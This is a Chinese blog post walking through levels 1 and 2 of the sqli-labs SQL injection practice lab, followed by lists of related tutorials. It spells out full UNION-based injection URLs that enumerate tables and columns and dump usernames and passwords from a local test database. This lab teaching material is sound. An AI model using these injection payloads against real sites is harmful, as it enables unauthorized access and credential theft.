sql-labs 全关通关教程

已于 2024-07-23 22:49:44 修改
阅读量268 收藏 9
点赞数 4
文章标签: sql 数据库
于 2024-07-22 17:56:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57682301/article/details/140615853
版权

首先先搭建sql-labs靶场环境(不会的百度搜一下有教程)

less-1

进入页面看到让输入ID

在地址栏后输入?id=1查看页面是否有变化

判断是否有sql注入,在后面跟一个',页面报sql语法错误证明有sql注入

输入--+页面回复正常证明闭合成功

使用orderby语句判断有几列(从一开始判断)

在输入4时页面报错,证明有三列

将id=1改为-1并使用联合查询找出回显位置,这里显示2和3为回显位置

在2的回显位置上输入database()找出当前数据库名

根据当前数据库名使用代码找出当前数据库下有那些数据表 代码如下:http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,database(),group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+

根据数据表名找出当前数据表下的所有列名 代码如下:http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,database(),group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27--+

根据给出的列名找出各列的名字以及密码(username和password中间使用~分隔开 以便分清)

代码如下:http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,database(),group_concat(id,%27~%27,username,%27~%27,password)%20from%20users--+

less-2

进入页面请求输入ID

输入?id=1,发现页面有变化

输入'发现报错确定有sql注入

输入--+闭合发现不成功,把'删除发现闭合成功,判断为整型

使用orderby判断为3列

使用联合查询查看页面的回显值为2和3

查看数据库名和库内表名 代码如下:

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1%20union%20select%201,database(),group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27--+

用数据库名和表名查出表内各列的名称 代码如下:

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1%20union%20select%201,database(),group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27--+

用各列的值查找出表内的各值 代码如下:

http://127.0.0.1/sqli-labs-master/Less-2/?id=-1%20union%20select%201,database(),group_concat(username,%27~%27,password)%20from%20users--+

当前先更新这么多,后面的内容下次更新,溜了~

狂i
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL-Labs靶场“46-50”关通关教程
钟言的博客
02-24 1万+
本篇为SQL-Labs靶场的第46关到50关教程,详细内容包含了:四十六关 ORDER BY数字型注入 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 5、报错注入 6、Limit注入 四十七关 ORDER BY单引号报错注入 1、源码分析 2、报错注入 3、时间盲注 三、四十八关 ODRER BY数字型盲注 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 四、四十九关 ORDER BY单引号盲注1、源码分析 2、时间盲注 五、五十关 ORDER BY数字型堆叠注等
SQL-Labs靶场“36-37”关通关教程
钟言的博客
03-19 3409
本篇为SQL-Labs靶场的36关到37关的通关教程,详细内容包含了:一、36关 GET单引号宽字节注入1、源码分析2、联合查询注入3、updatexml报错注入4、floor报错注入37关POST单引号宽字节注入1、源码分析2、联合查询注入3、updatexml报错注入4、floor报错注入等内容
SQL-Labs靶场“32-33”关通关教程
钟言的博客
03-14 5674
本篇为SQL-Labs靶场的第32关到33关的通关教程(宽字节注入),详细内容包含了、32关 GET单引号闭合宽字节注入 1、源码分析 2、宽字节注入原理 3、联合查询 4、updatexml报错注入 5、floor报错注入 、33关 GET单引号addslashes逃逸注入 1、源码分析 2、联合查询 3、updatexml报错注入 4、floor报错注入等内容
SQL-Labs靶场“34-35”关通关教程
钟言的博客
03-18 2527
本篇为SQL-Labs靶场的34到35关教程,详细内容包含了:34关 POST单引号宽字节注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 4、floor报错注入 35关 GET数字型报错注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 4、floor报错注入等内容
sql-labs通关教程
m0_62274649的博客
10-30 830
sqllabs搭建
SQL-Labs靶场“21-25”关通关教程
钟言的博客
02-20 1万+
本篇为SQL-Labs靶场的21关到25关通关教程,详细内容包含了、二十一关 基于base64编码单引号Cookie注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 、二十二关 基于base64编码双引号Cookie注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 二十三关 基于GET过滤注释 1、源码分析 2、updatexml报错注入 3、联合查询注入 四、二+四关 基于POST存储型二次注入 1、源码分析 2、二次注入 五、二十五关 基于GET单引号OR、A等等
Sql-labs-master通关攻略
weixin_51289292的博客
12-08 158
bp抓包爆破数据库长度,对比回包的时间发现8的时间较长,可知数据库长度为5,按此方式可以得知别的信息。为了简洁,接下来的关卡只显示databae(),和version内容。利用bp抓包进行database长度爆破,可以得知长度为8。这会提示注入密码部分,报错注入,闭合方式为单引号。没有回显有报错,使用报错注入,闭合方式为')还是字符型注入,这回闭合换成了")判断为字符型注入,但是没有回显。无回显,无报错,猜测是布尔盲注。多次输入未果,判断为延时注入。布尔盲注,闭合方式为单引号。数字型注入,换成了')
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sql-labs通关
m0_74013288的博客
10-15 212
查库:select schema_name from information_schema. schemata;查表: select table_name from information_schema.tables where table_schema='security';查列:select column_name form information_schema.columns where table_name='users';
SQL-labs/less1通关教程
02-29
参考了部分大佬的作品 原作链接:https://blog.csdn.net/qq_50808416/article/details/130623497
sql-labs通关技巧
03-01
在SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据关卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列关于SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习。 SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
PostgreSQL异常:An I/O error occurred while sending to the backend
IT后浪的博客
07-19 444
在使用PostgreSQL数据库批量写入数据的时候,遇到了一个问题,异常内容如下:Cause: org.postgresql.util.PSQLException: An I/O error occurred while sending to the backend.
SQL Server开发新纪元:用SQL Server Data Tools (SSDT) 打造数据库
2401_85341950的博客
07-20 966
SSDT 是一个基于Visual Studio的开发工具,它集成了对SQL Server数据库项目的支持。SSDT 提供了可视化的设计界面,以及对数据库版本控制和自动化测试的支持。
SQL Server内置的HTAP技术
最新发布
2401_85789772的博客
07-22 466
假设用户建了一个行存索引和列存索引组合的表,事务插入数据时,会同时插入行存和Delta Store,Delta Store达到100W行阈值后冻结,tuple-mover后台线程会将其中较冷的数据迁移到Main Store,无论是过去的传统数仓,还是现在的大数据技术栈,都存在这个时效性问题。根据数仓场景的特点,SQL Server列存的开销其实可以接受,然后使用类Delta-Main架构也是比较主流的做法,但是到了HTAP的场景,整个数据库需要支撑高并发的查询和更新,列存的开销就会被放大。
PostgreSQL的逻辑架构
weixin_41992498的博客
07-18 191
一、PostgreSql的逻辑架构:所有者:
sqli-labs-18通关
05-19
SQLi-18 是一个SQL注入漏洞测试平台,通关即代表你已经掌握了一些SQL注入漏洞的知识和技能。在通关过程中,你需要完成一系列的任务,包括利用不同的SQL注入漏洞获取敏感信息、绕过不同的安全机制、提权等等。这个平台对于学习和练习SQL注入漏洞非常有帮助。 具体的通关流程可以在 sqli-labs-18 的官方网站上找到,主要分为以下几个阶段: 1. 利用基本的SQL注入漏洞获取敏感信息。 2. 绕过不同的安全机制,包括过滤、转义等等。 3. 利用SQL注入漏洞进行提权。 4. 综合运用前面所学的知识,进行攻击和防御。 在完成每一个任务之后,建议反思自己的思路和方法,总结经验教训。同时,还需要注意安全问题,不要利用这些技能进行非法活动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值